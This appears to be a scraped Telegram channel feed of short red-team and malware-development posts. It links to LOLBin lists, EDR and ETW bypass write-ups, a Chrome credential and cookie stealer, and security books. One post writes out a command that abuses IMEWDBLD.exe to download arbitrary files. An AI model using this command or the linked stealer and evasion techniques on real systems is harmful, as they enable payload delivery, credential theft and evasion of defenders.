Source Byte – Telegram
Source Byte
7.76K subscribers
846 photos
73 videos
678 files
1.68K links
هشیار کسی باید کز عشق بپرهیزد
وین طبع که من دارم با عقل نیامیزد
Saadi Shirazi 187
Download Telegram
👍4
Source Byte pinned Deleted message
Loading DLLs without LoadLibraryA. Instead we'll leverage the VEH (Vectored Exception Handler) to modify the context, especially RIP and RCX to hold the LoadLibraryA address and it's argument.

Link

#malware_dev
———
@islemolecule_source
🔥31👍1🤡1
LOLBAS
Living Off The Land techniques.
GitHub
Doc

#windows
#redteam
#lolbin
———
@islemolecule_source
🔥3👍1
👍3🔥1
LOLBin: fhmanagew.exe
Link


#windows
#redteam
#lolbin
———
@islemolecule_source
👍3
LOLBin for Downloading Arbitrary Files

C:\Windows\System32\IME\SHARED\IMEWDBLD.exe <URL>

Find the downloaded file in

%LocalAppData%\Microsoft\Windows\INetCache\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION>

#windows
#redteam
#lolbin
———
@islemolecule_source
👍2🔥2
"GTFOBins is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems."

Link

#linux
#redteam
#lolbin
———
@islemolecule_source
👍3
What the Vuln: EDR Bypass with LoLBins
Link

#windows
#redteam
#lolbin
———
@islemolecule_source
👍3🔥1
PS_Automation_Scripting.pdf
16.3 MB
"PowerShell Automation and Scripting for Cybersecurity: Hacking and defense for red and blue teamers", 2023.

#powershell
———
@islemolecule_source
👏4
Simple password/cookies/history/bookmarks stealer/dumper for chrome all version
Link

#malware_dev
———
@islemolecule_source
Download Reverse engineering, windows programming, internals,etc..
Link

#windows #reverse #programming #internals
———
@islemolecule_source
Manual Unpacking DotFix NiceProtect.rar
15.1 MB
Source Byte
Loading DLLs without LoadLibraryA
meanwhile him🫤
🤓3🔥1
allows any user to crash the Windows Event Log service of any other Windows 10/Windows Server 2022 machine on the same domain
Link

#windows
#malware_dev
———
@islemolecule_source
Secure Programming Cookbook for C and C++

this book covers unix base OS and windows 👍🏻
ec council - secure programming with c++

Chapter 1: Introduction to C++ Programming
Chapter 2: Battling Integer Vulnerabilities in C++
Chapter 3: Memory Management in C++
Chapter 4: Pointer Subterfuge and Object Misuse in C++
Chapter 5: Code Injection Attacks and Run-time Countermeasures
Chapter 6: Eliminate Common Issues with Multithreaded Programming: Concurrency and Parallelism
Chapter 7: Exceptions and Error Handling in C++
Chapter 8: Industry Resources and Best Practices for C++ Development


LINK
file password : https://news.1rj.ru/str/islemolecule_source


course website link
5👍1
👍3
post get updated :

+ Detecting In-Memory Threats with Kernel ETW Call Stacks
+ Direct Kernel Object Manipulation (DKOM) Attacks on ETW Providers
+ A Begginers All Inclusive Guide to ETW
+ ETW References
+ Give Me an E, Give Me a T, Give Me a W. What Do You Get? RPC! (pars events from the RPC ETW)
+ Attacks on ETW Blind EDR Sensors ( black hat con )